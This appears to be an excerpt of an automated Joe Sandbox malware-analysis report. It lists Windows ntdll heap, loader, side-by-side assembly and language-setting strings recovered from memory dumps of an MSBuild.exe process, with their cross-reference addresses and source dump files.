                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: $!$%$%%%u$%%%u!%s!$0$9$h$l$w
                                                                                                                                                                                                                                                                  • API String ID: 0-360209818
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                                                                                                                                                                                                                                  • API String ID: 0-3591852110
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                                                                                                                                                                                                                                  • API String ID: 0-3197712848
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                                                                                                                                                                                                                                  • API String ID: 0-3532704233
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                                                                                                                                                                                                                                  • API String ID: 0-1357697941
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                  • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                                                                                                                                                                                                                                                  • API String ID: 2994545307-3063724069
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                                                                                                                                                                  • API String ID: 0-1700792311
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 0137D2C3
                                                                                                                                                                                                                                                                  • @, xrefs: 0137D0FD
                                                                                                                                                                                                                                                                  • @, xrefs: 0137D313
                                                                                                                                                                                                                                                                  • Control Panel\Desktop\LanguageConfiguration, xrefs: 0137D196
                                                                                                                                                                                                                                                                  • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 0137D262
                                                                                                                                                                                                                                                                  • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 0137D0CF
                                                                                                                                                                                                                                                                  • @, xrefs: 0137D2AF
                                                                                                                                                                                                                                                                  • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 0137D146
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                                                                                                                                                                                                                                  • API String ID: 0-1356375266
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • sxsisol_SearchActCtxForDllName, xrefs: 013E76DD
                                                                                                                                                                                                                                                                  • @, xrefs: 01399EE7
                                                                                                                                                                                                                                                                  • !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT), xrefs: 013E7709
                                                                                                                                                                                                                                                                  • Status != STATUS_NOT_FOUND, xrefs: 013E789A
                                                                                                                                                                                                                                                                  • Internal error check failed, xrefs: 013E7718, 013E78A9
                                                                                                                                                                                                                                                                  • minkernel\ntdll\sxsisol.cpp, xrefs: 013E7713, 013E78A4
                                                                                                                                                                                                                                                                  • [%x.%x] SXS: %s - Relative redirection plus env var expansion., xrefs: 013E76EE
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT)$@$Internal error check failed$Status != STATUS_NOT_FOUND$[%x.%x] SXS: %s - Relative redirection plus env var expansion.$minkernel\ntdll\sxsisol.cpp$sxsisol_SearchActCtxForDllName
                                                                                                                                                                                                                                                                  • API String ID: 0-761764676
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                                                                                                                                                                                  • API String ID: 0-1109411897
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                                                                                                  • API String ID: 0-523794902
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • LdrpInitShimEngine, xrefs: 013D99F4, 013D9A07, 013D9A30
                                                                                                                                                                                                                                                                  • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 013D9A2A
                                                                                                                                                                                                                                                                  • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 013D99ED
                                                                                                                                                                                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 013D9A11, 013D9A3A
                                                                                                                                                                                                                                                                  • apphelp.dll, xrefs: 01376496
                                                                                                                                                                                                                                                                  • Getting the shim engine exports failed with status 0x%08lx, xrefs: 013D9A01
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: $: $: $Host$Host: $Unknown
Uniqueness

Uniqueness Score: -1.00%

Strings
• RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 013F02E7
• RTL: Re-Waiting, xrefs: 013F031E
• RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 013F02BD
Memory Dump Source
• Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
Similarity
• API ID:
• String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
• API String ID: 0-2474120054
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
Similarity
• API ID:
• String ID: @$AVRF: Verifier .dlls must not have thread locals$KnownDllPath$L$\KnownDlls32
• API String ID: 0-3127649145
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
Similarity
• API ID:
• String ID: $ $Internal error check failed$Status != STATUS_SXS_SECTION_NOT_FOUND$minkernel\ntdll\sxsisol.cpp
• API String ID: 0-3393094623
Uniqueness

Uniqueness Score: -1.00%

Strings
• Kernel-MUI-Language-Allowed, xrefs: 013A527B
• Kernel-MUI-Language-SKU, xrefs: 013A542B
• Kernel-MUI-Language-Disallowed, xrefs: 013A5352
• WindowsExcludedProcs, xrefs: 013A522A
• Kernel-MUI-Number-Allowed, xrefs: 013A5247
Memory Dump Source
• Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
Similarity
• API ID:
• String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
• API String ID: 0-258546922
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
Similarity
• API ID:
• String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
• API String ID: 0-2518169356
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
Similarity
• API ID:
• String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
• API String ID: 0-3178619729
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
Similarity
• API ID: InitializeThunk
• String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
• API String ID: 2994545307-3570731704
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section., xrefs: 013E7D03
                                                                                                                                                                                                                                                                  • SXS: String hash collision chain offset at %p (= %ld) out of bounds, xrefs: 013E7D56
                                                                                                                                                                                                                                                                  • SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p, xrefs: 013E7D39
                                                                                                                                                                                                                                                                  • SsHd, xrefs: 0139A885
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section.$SXS: String hash collision chain offset at %p (= %ld) out of bounds$SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p$SsHd
                                                                                                                                                                                                                                                                  • API String ID: 0-2905229100
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                                                                                                                                                                  • API String ID: 0-3178619729
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                                                                                                                                                                  • API String ID: 0-379654539
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • @, xrefs: 013B8591
                                                                                                                                                                                                                                                                  • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 013B855E
                                                                                                                                                                                                                                                                  • LdrpInitializeProcess, xrefs: 013B8422
                                                                                                                                                                                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 013B8421
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                                                  • API String ID: 0-1918872054
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • HEAP: , xrefs: 013E54E0, 013E55A1
                                                                                                                                                                                                                                                                  • HEAP[%wZ]: , xrefs: 013E54D1, 013E5592
                                                                                                                                                                                                                                                                  • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 013E54ED
                                                                                                                                                                                                                                                                  • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 013E55AE
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                                                                                                                                                                                                                                  • API String ID: 0-1657114761
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                  • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                                                                                                                                                                                                                                  • API String ID: 2994545307-336120773
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • LdrpDynamicShimModule, xrefs: 013EA998
                                                                                                                                                                                                                                                                  • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 013EA992
                                                                                                                                                                                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 013EA9A2
                                                                                                                                                                                                                                                                  • apphelp.dll, xrefs: 013A2462
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                                                  • API String ID: 0-176724104
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
